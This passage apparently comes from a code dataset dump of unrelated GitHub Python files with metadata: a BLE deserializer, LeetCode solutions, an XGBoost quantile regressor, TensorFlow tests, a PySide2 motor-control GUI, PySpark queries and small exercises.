errors\n\n Args:\n failure: failure object\n \"\"\"\n\n self.logger.error(repr(failure))\n\n if failure.check(HttpError):\n response = failure.value.response\n self.logger.error(\"HttpError on %s\", response.url)\n\n elif failure.check(DNSLookupError):\n request = failure.request\n self.logger.error(\"DNSLookupError on %s\", request.url)\n\n elif failure.check(TimeoutError, TCPTimedOutError):\n request = failure.request\n self.logger.error(\"TimeoutError on %s\", request.url)\n\n\n\n","repo_name":"priye-1/airflow_data_pipeline","sub_path":"dags/scraper/pst_ag_project/pst_ag_project/spiders/rwjst_spider.py","file_name":"rwjst_spider.py","file_ext":"py","file_size_in_byte":7799,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"38195814310","text":"import logging\nimport time\n\nfrom variables import RSSI_SIZE_BYTES, SCANNER_ID_SIZE_BYTES\n\ndef deserialize(buffer):\n curr_byte = 0\n \n # normalize buffer comming from dbus\n buffer = [int(value) for value in buffer]\n\n scanner_id = buffer[curr_byte]\n curr_byte += SCANNER_ID_SIZE_BYTES\n\n mac_size = buffer[curr_byte]\n curr_byte += 1\n\n num_rssi = buffer[curr_byte]\n curr_byte += 1\n\n result = {\n 'scanner_id': scanner_id,\n 'last_batch': last_batch(buffer, mac_size, num_rssi),\n 'timestamp': time.time(),\n }\n \n if len(buffer) > (mac_size + (RSSI_SIZE_BYTES * num_rssi)) + SCANNER_ID_SIZE_BYTES:\n device_scans = {}\n while curr_byte + (num_rssi * RSSI_SIZE_BYTES) + mac_size < len(buffer):\n mac_address = deserialize_mac(buffer[curr_byte:(curr_byte+mac_size)])\n curr_byte += mac_size\n rssis = []\n 
curr_rssi = 0\n while curr_rssi < num_rssi:\n rssis += [-(buffer[curr_byte])]\n curr_byte += RSSI_SIZE_BYTES\n curr_rssi += 1\n\n device_scans[mac_address] = rssis\n\n result['devices'] = device_scans\n\n logging.debug(f'Deserialized the following values: {result}')\n \n return result\n\ndef deserialize_mac(buffer):\n mac_hex = [format(value, '02x') for value in buffer]\n return ':'.join(mac_hex).lower()\n\ndef last_batch(buffer, mac_size, num_rssi):\n buffer_len = len(buffer)\n # subtract scanner ID from buffer\n buffer_len -= 3\n return buffer_len % (mac_size + (RSSI_SIZE_BYTES * num_rssi)) != 0","repo_name":"frederico-apolonia/boa","sub_path":"scanner-gateway/ble/src/deserialize.py","file_name":"deserialize.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73922072488","text":"# You have a graph of n nodes. You are given an integer n and an array edges where edges[i] = [ai, bi] indicates that there is an edge between ai and bi in the graph.\n\n# Return the number of connected components in the graph.\n\n \n\n# Example 1:\n\n\n# Input: n = 5, edges = [[0,1],[1,2],[3,4]]\n# Output: 2\n# Example 2:\n\n\n# Input: n = 5, edges = [[0,1],[1,2],[2,3],[3,4]]\n# Output: 1\n \n\n# Constraints:\n\n# 1 <= n <= 2000\n# 1 <= edges.length <= 5000\n# edges[i].length == 2\n# 0 <= ai <= bi < n\n# ai != bi\n# There are no repeated edges.\n\nclass Solution:\n def countComponents(self, n: int, edges: List[List[int]]) -> int:\n arr = [i for i in range(n)]\n\n def find(x):\n nonlocal arr\n return x if arr[x] == x else find(arr[x])\n\n def union(x, y):\n nonlocal arr\n arr[find(x)] = find(y)\n\n for [x, y] in edges:\n union(x, y)\n\n return len([1 for idx, item in enumerate(arr) if idx == item])\n\n\nclass Solution:\n def countComponents(self, n: int, edges: List[List[int]]) -> int:\n uniq_set = set()\n res = 0\n\n def dfs(i, pairs):\n nonlocal uniq_set\n if i in pairs:\n for j in pairs[i]:\n if not j in uniq_set:\n uniq_set.add(j)\n dfs(j, pairs)\n\n pairs = {}\n for [x, y] in edges:\n if not x in pairs:\n pairs[x] = set()\n if not y in pairs:\n pairs[y] = set()\n pairs[x].add(y)\n pairs[y].add(x)\n\n for i in range(n):\n if not i in uniq_set:\n res += 1\n dfs(i, pairs)\n return res\n","repo_name":"jHuang30/Ds-and-Algo-in-Python","sub_path":"323. Number of Connected Components in an Undirected Graph.py","file_name":"323. 
Number of Connected Components in an Undirected Graph.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7730781566","text":"import random\nimport pandas as pd\nimport numpy as np\nfrom functools import partial\nfrom sklearn.datasets import load_boston\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.preprocessing import MinMaxScaler\nfrom xgboost.sklearn import XGBRegressor\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n\n\n\ndef generate_data():\n x,y= load_boston(return_X_y=True)\n x_train, x_val, y_train, y_val=train_test_split(x,y,test_size=.2)\n \n return(x_train, x_val, y_train, y_val)\n\n\n\n\n\ndef plot_result(y_val,y_upper,y_lower):\n fig = plt.figure(figsize=(12,6))\n x_point=range(y_val.shape[0])\n pic_data=pd.DataFrame({'y':y_val,'upper':y_upper,'lower':y_lower}).sort_values('y')\n plt.plot(x_point,pic_data['y'], 'g:')\n plt.plot(x_point, pic_data['upper'], 'k-')\n plt.plot(x_point, pic_data['lower'], 'k-')\n plt.fill(np.concatenate([x_point, x_point[::-1]]),\n np.concatenate([pic_data['upper'], pic_data['lower'][::-1]]),\n alpha=.5, fc='r', ec='None')\n\n\n\n\n\ndef predict_interval(x_train,y_train,x_val,model,alpha=.9,xgb=False):\n \n model.fit(x_train,y_train)\n y_pred=model.predict(x_val)\n \n if xgb :\n model.set_params(loss='quantile', quant_alpha=alpha)\n model.set_params(loss='quantile', alpha=alpha)\n model.fit(x_train,y_train)\n y_upper= model.predict(x_val) \n \n if xgb :\n model.set_params(loss='quantile', quant_alpha=1-alpha)\n model.set_params(loss='quantile', alpha=1-alpha)\n model.fit(x_train,y_train)\n y_lower= model.predict(x_val)\n \n return(y_upper,y_lower)\n\n\n\n\n\nclass XGBQuantile(XGBRegressor):\n def __init__(self,quant_alpha=0.95,quant_delta = 1.0,quant_thres=1.0,quant_var =1.0,base_score=0.5, booster='gbtree', colsample_bylevel=1,\n colsample_bytree=1, gamma=0, learning_rate=0.1, max_delta_step=0,max_depth=3, min_child_weight=1, missing=None, n_estimators=100,\n n_jobs=1, nthread=None, objective='reg:linear', random_state=0,reg_alpha=0, reg_lambda=1, scale_pos_weight=1, seed=None,silent=True, subsample=1):\n self.quant_alpha = quant_alpha\n self.quant_delta = quant_delta\n self.quant_thres = quant_thres\n self.quant_var = quant_var\n \n super().__init__(base_score=base_score, booster=booster, colsample_bylevel=colsample_bylevel,\n colsample_bytree=colsample_bytree, gamma=gamma, learning_rate=learning_rate, max_delta_step=max_delta_step,\n max_depth=max_depth, min_child_weight=min_child_weight, missing=missing, n_estimators=n_estimators,\n n_jobs= n_jobs, nthread=nthread, objective=objective, random_state=random_state,\n reg_alpha=reg_alpha, reg_lambda=reg_lambda, scale_pos_weight=scale_pos_weight, seed=seed,\n silent=silent, subsample=subsample)\n \n self.test = None\n \n def fit(self, X, y):\n super().set_params(objective=partial(XGBQuantile.quantile_loss,alpha = self.quant_alpha,delta = self.quant_delta,threshold = self.quant_thres,var = self.quant_var) )\n super().fit(X,y)\n return self\n \n def predict(self,X):\n return super().predict(X)\n \n def score(self, X, y):\n y_pred = super().predict(X)\n score = XGBQuantile.quantile_score(y, y_pred, self.quant_alpha)\n score = 1./score\n return score\n \n @staticmethod\n def quantile_loss(y_true,y_pred,alpha,delta,threshold,var):\n x = y_true - y_pred\n grad = (x<(alpha-1.0)*delta)*(1.0-alpha)- 
((x>=(alpha-1.0)*delta)& (x<alpha*delta) )*x/delta-alpha*(x>alpha*delta)\n hess = ((x>=(alpha-1.0)*delta)& (x<alpha*delta) )/delta \n \n# grad = (np.abs(x)<threshold )*grad - (np.abs(x)>=threshold )*(2*np.random.randint(2, size=len(y_true)) -1.0)*var\n# hess = (np.abs(x)<threshold )*hess + (np.abs(x)>=threshold )\n return grad, hess\n \n @staticmethod\n def original_quantile_loss(y_true,y_pred,alpha,delta):\n x = y_true - y_pred\n grad = (x<(alpha-1.0)*delta)*(1.0-alpha)-((x>=(alpha-1.0)*delta)& (x<alpha*delta) )*x/delta-alpha*(x>alpha*delta)\n hess = ((x>=(alpha-1.0)*delta)& (x<alpha*delta) )/delta \n return grad,hess\n\n \n @staticmethod\n def quantile_score(y_true, y_pred, alpha):\n score = XGBQuantile.quantile_cost(x=y_true-y_pred,alpha=alpha)\n score = np.sum(score)\n return score\n \n @staticmethod\n def quantile_cost(x, alpha):\n return (alpha-1.0)*x*(x<0)+alpha*x*(x>=0)\n \n @staticmethod\n def get_split_gain(gradient,hessian,l=1):\n split_gain = list()\n for i in range(gradient.shape[0]):\n split_gain.append(np.sum(gradient[:i])**2/(np.sum(hessian[:i])+l)+np.sum(gradient[i:])**2/(np.sum(hessian[i:])+l)-np.sum(gradient)**2/(np.sum(hessian)+l) )\n \n return np.array(split_gain)\n\n\n\n","repo_name":"z888888861/Quantile_Regression","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":4689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22801848257","text":"import unittest\nimport tensorflow as tf\n#from thesis_models.krpn_model import load_and_reshape\nfrom thesis_models.path_hier_att_model import scaled_dot_attention, mask_tensor\nimport numpy as np\n\n\nclass KRPNTest(unittest.TestCase):\n\n def test_load_and_reshape(self):\n success = True\n\n self.assertEqual(success, True)\n\n\ndef test_scaled_dot_attention():\n batch_size, num_paths, path_length, dim = 2, 3, 3, 2\n\n # test first attention computation; rank 4 tensors\n path_embs = np.ones((batch_size, num_paths, path_length, dim))\n ext_emb = 2 * np.ones((batch_size, dim))\n with tf.Session() as sess:\n x = tf.constant(path_embs, tf.float32)\n y = tf.constant(ext_emb, tf.float32)\n y = tf.expand_dims(tf.expand_dims(y, 1), 2)\n y = tf.broadcast_to(y, [batch_size, num_paths, 1, dim])\n\n att_val = scaled_dot_attention(y, x)\n y, att_val = sess.run([y, att_val])\n assert att_val.shape == (batch_size, num_paths, 1, dim)\n\n # test second attention computation; rank 3 tensors\n path_embs = np.ones((batch_size, num_paths, dim))\n ext_emb = 2 * np.ones((batch_size, dim))\n with tf.Session() as sess:\n x = tf.constant(path_embs, tf.float32)\n y = tf.constant(ext_emb, tf.float32)\n y = tf.expand_dims(y, 1)\n y = tf.broadcast_to(y, [batch_size, 1, dim])\n\n att_val = scaled_dot_attention(y, x)\n y, att_val = sess.run([y, att_val])\n assert att_val.shape == (batch_size, 1, dim)\n\n\ndef test_mask_tensor():\n\n x = np.ones((3, 3))\n y = np.array([0, 1, 0])\n\n masked_correct = np.zeros((3, 3))\n masked_correct[1] = np.ones(3)\n\n with tf.Session() as sess:\n x = tf.constant(x, tf.float32)\n y = tf.constant(y, tf.float32)\n\n masked_x = mask_tensor(x, y)\n\n masked_x = sess.run(masked_x)\n\n assert np.all(np.equal(masked_x, masked_correct))\n assert np.all(np.equal(masked_x, x)) == False\n","repo_name":"AndSt/thesis_models","sub_path":"tests/test_path_hier_att_model.py","file_name":"test_path_hier_att_model.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
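Editor's sketch, not part of the corpus: the Utils.py record above defines XGBQuantile, whose fit returns self, so two models fitted at quant_alpha=0.95 and quant_alpha=0.05 give an approximate 90% prediction interval. This minimal example assumes XGBQuantile is importable from that record's file as a module named Utils (a hypothetical path), and substitutes make_regression for the deprecated load_boston the record uses.

import numpy as np
from sklearn.datasets import make_regression
from sklearn.model_selection import train_test_split
from Utils import XGBQuantile  # assumption: the record's Utils.py is on the path

# Synthetic regression data; load_boston was removed from recent scikit-learn.
x, y = make_regression(n_samples=500, n_features=10, noise=10.0, random_state=0)
x_train, x_val, y_train, y_val = train_test_split(x, y, test_size=0.2, random_state=0)

# One model per quantile: upper (alpha=0.95) and lower (alpha=0.05) bounds.
upper = XGBQuantile(quant_alpha=0.95).fit(x_train, y_train).predict(x_val)
lower = XGBQuantile(quant_alpha=0.05).fit(x_train, y_train).predict(x_val)

# Empirical coverage of the interval; ideally close to 0.90.
coverage = np.mean((y_val >= lower) & (y_val <= upper))
print(f"interval coverage: {coverage:.2f}")

Using the two classes directly avoids the record's predict_interval helper, which calls set_params(loss=...) on an XGBRegressor that has no such parameter when its xgb flag is set.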
+{"seq_id":"3043628676","text":"from PySide2.QtWidgets import QApplication, QMainWindow, QMessageBox, QLineEdit\nfrom PySide2 import QtCore\nfrom PySide2.QtCore import Qt, QTimer, Signal \nfrom PySide2.QtUiTools import QUiLoader\nfrom command import Command\nfrom set_magnification import InputDialog\nfrom sub_1 import Final\nfrom angle_data import angleData\nimport serial\nimport os\n\npath = \"./main.ui\"\ncom = Command()\nuartport = \"/dev/ttyUSB0\"\n#uartport = \"COM10\"\nclass MyLineEdit(QLineEdit):# modify QLineEdit's trigger signal\n clicked = Signal()\n def mouseReleaseEvent(self, QMouseEvent):\n if QMouseEvent.button()==Qt.LeftButton:\n self.clicked.emit()\nclass Stats(QMainWindow):\n def __init__(self):\n \n\n super().__init__()\n self.ui =QUiLoader().load(path)\n self.ui.setWindowFlags(Qt.Window | Qt.FramelessWindowHint) # make the window frameless\n self.ui.resize(800,480)\n self.ui.move(0,0)\n \n self.ui.Stop.clicked.connect(self.stop)\n self.ui.Start.clicked.connect(self.start)\n self.ui.Shutdown.clicked.connect(self.shutdown)\n self.ui.Select.clicked.connect(self.select)\n self.ui.Backhome.clicked.connect(self.backhome)\n self.ui.Clean.clicked.connect(self.clean)\n\n # modify the QLineEdit trigger behaviour\n self.ui.Theoretical_distance = MyLineEdit(self.ui.Theoretical_distance)\n self.ui.Theoretical_distance.clicked.connect(self.set_Theoretical_distance)\n self.Theoretical_distance = 10000\n self.ui.Theoretical_distance.setText(str(self.Theoretical_distance)) \n\n self.ui.Measure_distance = MyLineEdit(self.ui.Measure_distance)\n self.ui.Measure_distance.clicked.connect(self.set_Measure_distance)\n self.Measure_distance = 100\n self.ui.Measure_distance.setText(str(self.Measure_distance)) \n #===========================================================#\n\n self.ui.Display.setText(\"Welcome to the laser attenuation program\\n\")\n \n self.ui.show()\n self.timer = QTimer()\n\n self.initialization_hardware()\n\n # internal parameter settings\n self.uarttime = 1000 # base unit for UART transmission timing\n self.compensate_motor_2 = 105 # compensation angle for motor 2\n self.compensate_motor_3 = 100 # compensation angle for motor 3\n self.data = angleData() # load the attenuation angle data\n self.keylist = list(self.data) # turn the attenuation angle keys into a list\n self.key_num = 0 # set the list index to 0\n self.magnification = self.keylist[0] # preset the attenuation magnification to zero\n\n# hardware functions\n def initialization_hardware(self):\n # initialise the serial port\n self.ser = serial.Serial(uartport,9600,timeout=1)\n for i in com.scan():\n self.ser.write(bytes(i,encoding='ASCII'))\n\n def move(self,angleData):\n self.timer.singleShot(self.uarttime*1,lambda:self.ser.write(bytes(com.ma(2,angleData[1]+self.compensate_motor_2),encoding='ASCII')))\n self.timer.singleShot(self.uarttime*2,lambda:self.ser.write(bytes(com.ma(3,angleData[2]+self.compensate_motor_3),encoding='ASCII')))\n \n def sub(self):\n self.key_num = self.keylist.index(self.magnification)\n if self.key_num == 0:\n self.key_num = 1\n else :\n self.key_num -= 1\n self.magnification = self.keylist[self.key_num]\n angleData = self.data[str(self.magnification)]\n self.display(1000,f\"Current magnification {self.magnification}\")\n self.move(angleData)\n def add(self):\n self.key_num = self.keylist.index(self.magnification)\n if self.key_num >= len(self.keylist)-1:\n self.key_num = len(self.keylist)-1\n else :\n self.key_num += 1\n self.magnification = self.keylist[self.key_num]\n angleData = self.data[str(self.magnification)]\n self.display(1000,f\"Current magnification {self.magnification}\")\n self.move(angleData)\n\n# function-key routines\n def stop(self):\n self.timer.singleShot(self.uarttime*0,lambda:self.ser.write(bytes(com.stop(2),encoding='ASCII')))\n self.timer.singleShot(self.uarttime*1,lambda:self.ser.write(bytes(com.stop(3),encoding='ASCII')))\n 
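# both stop commands are now queued on the timer; report the halt on the display\n 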
self.display(100,\"Motor operation halted\")\n\n def clean(self):\n cleantime = 30000\n self.display(100,\"Starting motor cleaning, expected to finish in 30 seconds\")\n self.timer.singleShot(self.uarttime*1,lambda:self.ser.write(bytes(com.clean(2),encoding='ASCII')))\n self.timer.singleShot(self.uarttime*2,lambda:self.ser.write(bytes(com.clean(3),encoding='ASCII')))\n self.timer.singleShot(cleantime+2000,lambda:self.ser.write(bytes(com.stop(2),encoding='ASCII')))\n self.timer.singleShot(cleantime+3000,lambda:self.ser.write(bytes(com.stop(3),encoding='ASCII')))\n self.display(cleantime+3000,\"Motor cleaning finished\")\n self.timer.singleShot(cleantime+4000,lambda:self.backhome())\n\n def shutdown(self):\n qm = QMessageBox.question(self.ui,\"Confirm shutdown\",\"Are you sure?\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if qm == QMessageBox.Yes:\n self.stop()\n self.display(100,\"Shutting down...\")\n self.timer.singleShot(1000,lambda:app.quit())\n\n '''\n os.system('cd /home/pi/motor_control/')\n os.system('git pull')\n os.system(\"sudo poweroff\")\n '''\n else:\n self.display(100,\"Shutdown cancelled\")\n\n def set_Theoretical_distance(self):\n dialog = InputDialog.getValue(self,\"Maximum range\",\"Please enter the maximum measuring distance\",'',100000,0)\n self.setValue = dialog\n self.Theoretical_distance = str(self.setValue)\n self.ui.Theoretical_distance.setText(self.Theoretical_distance)\n\n def set_Measure_distance(self):\n dialog = InputDialog.getValue(self,\"Measuring distance\",\"Please enter the experiment distance\",'',10000,0)\n self.setValue = dialog\n self.Measure_distance = str(self.setValue)\n self.ui.Measure_distance.setText(self.Measure_distance) \n\n def backhome(self):\n self.display(100,\"Returning to the home position\")\n self.display(1000,\"Motor 1 homing\")\n self.display(1100,\"Motor 2 homing\",1)\n self.display(1200,\"Motor 3 homing\",1)\n self.display(3000,\"Welcome to the laser ranging program\")\n self.timer.singleShot(self.uarttime*1,lambda:self.ser.write(bytes(com.home(2),encoding='ASCII')))\n self.timer.singleShot(self.uarttime*2,lambda:self.ser.write(bytes(com.home(3),encoding='ASCII')))\n self.magnification = '0x'\n self.key_num = 0\n self.move(self.data[self.magnification])\n self.display(4000,f\"Current magnification {self.magnification}\",1)\n\n @QtCore.Slot()\n def start(self):\n qm = QMessageBox.question(self.ui,\"Confirm the input parameters\",f\"Theoretical distance: {int(int(self.Theoretical_distance)/1000)} km\\nMeasuring distance: {self.Measure_distance} m\\nTest wavelength: {self.ui.Select_wavelength.currentText()}\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if qm == QMessageBox.Yes:\n if self.ui.Select_wavelength.currentText() == \"1550nm\":\n self.c = 0.731 \n elif self.ui.Select_wavelength.currentText() == \"1064nm\":\n self.c = 0.712\n elif self.ui.Select_wavelength.currentText() == \"905nm\":\n self.c = 0.692\n elif self.ui.Select_wavelength.currentText() == \"808nm\":\n self.c = 0.633\n else:\n self.c = 1\n \n self.display(100,\"Starting measurement\")\n self.recommend_magnification = int(round(int(self.Theoretical_distance)/int(self.Measure_distance)/1,0))# optionally divide by the wavelength factor self.c\n self.magnification = str(self.recommend_magnification)+'x'\n self.display(200,f\"Recommended magnification {self.magnification}\",1)\n self.display(300,f\"Adjusting magnification...\",1)\n self.move(self.data[self.magnification])# drive the motors to the selected magnification\n self.display(4000,f\"Current magnification {self.magnification}\",1)\n self.timer.singleShot(4100,lambda:self.limit())\n else:\n self.display(100,\"Please check the parameters\")\n\n def limit(self):\n q1 = QMessageBox.question(self.ui,\"Confirm whether measurement is possible\",f\"Current magnification {self.magnification}\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if q1 == QMessageBox.Yes:\n self.display(100,\"Increasing magnification\")\n self.timer.singleShot(1000,lambda:self.add())\n self.timer.singleShot(1500,lambda:self.limit_add())\n else:\n self.display(100,\"Decreasing magnification\")\n 
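# step the magnification down once, then run the decreasing limit search\n 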
self.timer.singleShot(1000,lambda:self.sub())\n self.timer.singleShot(1500,lambda:self.limit_sub())\n\n def limit_add(self):\n while True:\n q_add = QMessageBox.question(self.ui,\"Confirm whether measurement is possible\",\"Please wait while the motor increases the magnification\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if q_add == QMessageBox.Yes:\n self.timer.singleShot(1000,lambda:self.add())\n else:\n break\n self.display(100,f\"Critical magnification is {self.keylist[self.key_num-1]}\")\n self.magnification = self.keylist[self.key_num-1]\n self.move(self.data[self.magnification])\n self.timer.singleShot(1000,lambda:self.final_test())\n def limit_sub(self):\n while True:\n q_sub = QMessageBox.question(self.ui,\"Confirm whether measurement is possible\",\"Please wait while the motor decreases the magnification\",QMessageBox.Yes |QMessageBox.No, QMessageBox.Yes)\n if q_sub == QMessageBox.No:\n self.timer.singleShot(1000,lambda:self.sub())\n else:\n break\n self.display(100,f\"Critical magnification is {self.keylist[self.key_num]}\")\n self.timer.singleShot(1000,lambda:self.final_test())\n\n def final_test(self):\n dialog = Final.getValue(self,self.magnification)\n if dialog == 0:\n self.display(100,\"Cancelled by the user\")\n self.display(200,\"Please start over\",1)\n self.backhome()\n elif dialog == 1:\n self.display(100,\"Passed the critical magnification test\")\n temp = int(round(self.recommend_magnification/self.c,0)) # expected attenuation magnification at this wavelength\n tm = int(self.magnification.replace('x','')) # actual magnification\n distance = round(tm*self.c*int(self.Measure_distance)/1000,1)\n if tm >= temp:\n self.display(200,f\"Test passed, the maximum range exceeds the rated distance: {int(int(self.Theoretical_distance)/1000)} km\")\n self.display(300,f\"The extrapolated range reaches {distance} km\",1)\n else:\n self.display(200,f\"This laser rangefinder failed the test, it does not reach {int(int(self.Theoretical_distance)/1000)} km\")\n self.display(300,f\"The extrapolated range only reaches {distance} km\",1)\n else:\n self.display(100,\"Test failed, please start over\")\n self.backhome()\n\n\n @QtCore.Slot()\n def select(self):\n dialog = InputDialog.getValue(self,\"Attenuation magnification\",\"Please enter the attenuation magnification\")\n self.setValue = dialog\n tmp = str(self.setValue)+'x'\n self.display(100,\"Current magnification \"+tmp,0)\n self.key_num = self.keylist.index(tmp)\n self.move(self.data[tmp])\n\n\n# display window functions\n def display(self,time=100,message=\"\",type=0):\n if type == 0:\n self.timer.singleShot(time,lambda:self.ui.Display.setText(message))\n elif type ==1:\n self.timer.singleShot(time,lambda:self.ui.Display.append(message))\n\napp = QApplication([])\nwindow = Stats()\napp.exec_()\n\n\n","repo_name":"NUUEO/motor_control","sub_path":"mnd401/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15442452041","text":"from pathlib import Path\n\nfrom setuptools import find_packages, setup\n\nthis_directory = Path(__file__).parent\nlong_description = (this_directory / \"README.md\").read_text()\n\nsetup(\n name=\"blitzml\",\n packages=find_packages(include=[\"blitzml\", \"blitzml.*\"]),\n version=\"0.20.0\",\n description=\"A low-code library for machine learning pipelines\",\n author=\"AI Team\",\n license=\"MIT\",\n install_requires=[\n \"joblib>=1.2.0\",\n \"numpy<=1.23.4\",\n \"pandas>=1.5.1\",\n \"scikit-learn>=1.1.3\",\n \"Boruta>=0.3\",\n \"statsmodels<=0.14\",\n ],\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n)\n\n\n# Great resources\n# https://godatadriven.com/blog/a-practical-guide-to-using-setup-py/\n# https://realpython.com/pypi-publish-python-package/#publish-your-package-to-pypi\n# 
https://packaging.python.org/en/latest/overview/\n","repo_name":"blitzml/blitzml","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"22867360449","text":"\n\nclass node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children if children is not None else []\n\nclass ntree:\n def __init__(self,val=None):\n self.root = node(val)\n \n def add_child(self, val=None):\n cur_node = self.root\n new_node = node(val)\n\n cur_node.children.append(new_node)\n \nclass walk:\n def __init__(self):\n return\n def traverse(self, rt: node):\n\n r = []\n q = [rt]\n\n while q:\n cur_node = q.pop()\n\n if cur_node:\n r.append(cur_node.val)\n\n for c in cur_node.children:\n q.append(c)\n \n return r[::-1]\n\n def rtraverse(self,rt: node):\n if not rt:\n return []\n \n r = [rt.val]\n\n def helper(rt):\n\n for c in rt.children:\n r.append(c.val)\n helper(c)\n \n helper(rt)\n return r\n \nt = ntree(10)\nt.add_child(14)\nt.add_child(15)\nt.add_child(16)\nw = walk()\n\nprint(w.traverse(t.root))\nprint(w.rtraverse(t.root))","repo_name":"jcravener/PythonWorkroom","sub_path":"ntree2.py","file_name":"ntree2.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27636386087","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 28 19:17:57 2021\n\n@author: andreavergara\n\"\"\"\n\ndef mensaje ():\n print (\"\\tPlease enter the number: \\n\")\n\nprint (\"Start\")\nmensaje()\na=input()\nmensaje()\nb=input()\nmensaje()\nc=input()\nprint(a,b,c)\n\ndef hi (name): \n print (\"Hi: \",name)\nhi (\"Juan Carlos\")\nhi(\"cec\")\nhi(\"Ana\")\n\n\"\"\"\nCreated on Mon Jun 28 20:30:00 2021\n\n@author: andreavergara\narg is an argument that gets packed into a tuple; it lets \nthe function be called with a varying number of values\n\n\"\"\"\n\ndef suma(*arg):\n print(\"Data type of the argument; \", type(arg))\n sum = 0\n \n for n in arg: \n sum +=n \n #sum=sum+n \n \n print (\"Sum: \", sum)\n \nsuma(3)\nsuma(3,5)\nsuma(4,5,6,7)\nsuma(1,2,3,5,6)\n\n\"\"\"\nCreated on Mon Jun 28 20:36:54 2021\n\n@author: andreavergara\n\"\"\"\n\ndef keyw(**datos):\n print(\"\\nData type of the argument:\",type(datos))\n\n for key, value in datos.items():\n print(\"{} is {}\".format(key,value))\n\nkeyw(Firstname=\"Juan\", \n Lastname=\"Domínguez\", \n Age=42, \n Phone=1234567890)\nkeyw(Firstname=\"John\", \n Lastname=\"Wood\",\n Email=\"johnwood@nomail.com\",\n Country=\"Wakanda\", \n Age=25, \n Phone=9876543210)\n","repo_name":"Andreya9520/Python-Essential-","sub_path":"clase5.py","file_name":"clase5.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23172516802","text":"def target_sum(arr, t):\n seen = {}\n for i in range(len(arr)):\n num = arr[i]\n complement = t - num\n if num in seen:\n return seen[num]+1, i+1\n else:\n seen[complement] = i\n return -1\n\n\nf = open(\"input1.txt\", \"r\")\ng = open(\"output1.2.txt\", \"w\")\n\nn, target = list(map(int, f.readline().split(\" \")))\nitems = list(map(int, f.readline().split(\" \")))\n\nindex = target_sum(items, target)\nif index == -1:\n g.write(\"IMPOSSIBLE\")\nelse:\n g.write(str(index[0]) + \" \" + 
str(index[1]))\nf.close()\ng.close()\n","repo_name":"ReduanNurLabid/CSE221","sub_path":"task-1.2.py","file_name":"task-1.2.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21187901991","text":"from pyspark.sql import SparkSession\n\n\nspark = SparkSession.builder \\\n .master(\"local[1]\") \\\n .appName(\"hw5\") \\\n .getOrCreate()\n\n# 2a\nimport pyspark.sql.functions as fc\n\ncountryLang = spark.read.json('countrylanguage.json')\ncountryLang.filter('IsOfficial == \"T\"').groupBy('Language').agg(fc.count('*').alias('cnt')).orderBy('cnt', ascending=False).limit(10).show(truncate=False)\n\n# 2b\n\ncountry = spark.read.json('country.json')\ncity = spark.read.json('city.json')\ncountry.filter('Continent == \"North America\" and GNP >= 100000').select('Capital', country.Name.alias('CountryName')).join(city.select('ID', city.Name.alias('CapitalName')), country.Capital == city.ID).select('CountryName', 'CapitalName').show(truncate=False)\n\n\n# 2c\n\ncountry = spark.read.json('country.json')\ncountryLang = spark.read.json('countrylanguage.json')\ncountry.join(countryLang, (country.Continent == 'North America') & (country.Code == countryLang.CountryCode) & (countryLang.Language == 'English') & (countryLang.IsOfficial == 'T')).select('Name').show(truncate=False)\n\n# 2d\nimport pyspark.sql.functions as fc\n\ncity = spark.read.json('city.json')\ncity.filter('CountryCode == \"USA\"').agg(fc.max('Population')).show(truncate=False)\n\n# 2e\n\ncountryLang = spark.read.json('countrylanguage.json')\ncountryLang.filter('Language == \"English\" and IsOfficial == \"T\"').select('CountryCode').intersect(countryLang.filter('Language == \"French\" and IsOfficial == \"T\"').select('CountryCode')).show(truncate=False)\n\n","repo_name":"bvorapoom/usc_apds","sub_path":"551_Data Management/Homework5/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37456777204","text":"# Making a JadenCase string\n# https://programmers.co.kr/learn/courses/30/lessons/12951?language=python3\n\n# Set up an empty string answer and a variable count that marks where case handling should resume in s (skipping spaces),\n# then loop over the length of s; whenever i is a space, set count to i + 1 so the space is passed over and the loop can\n# move on to the next character. 
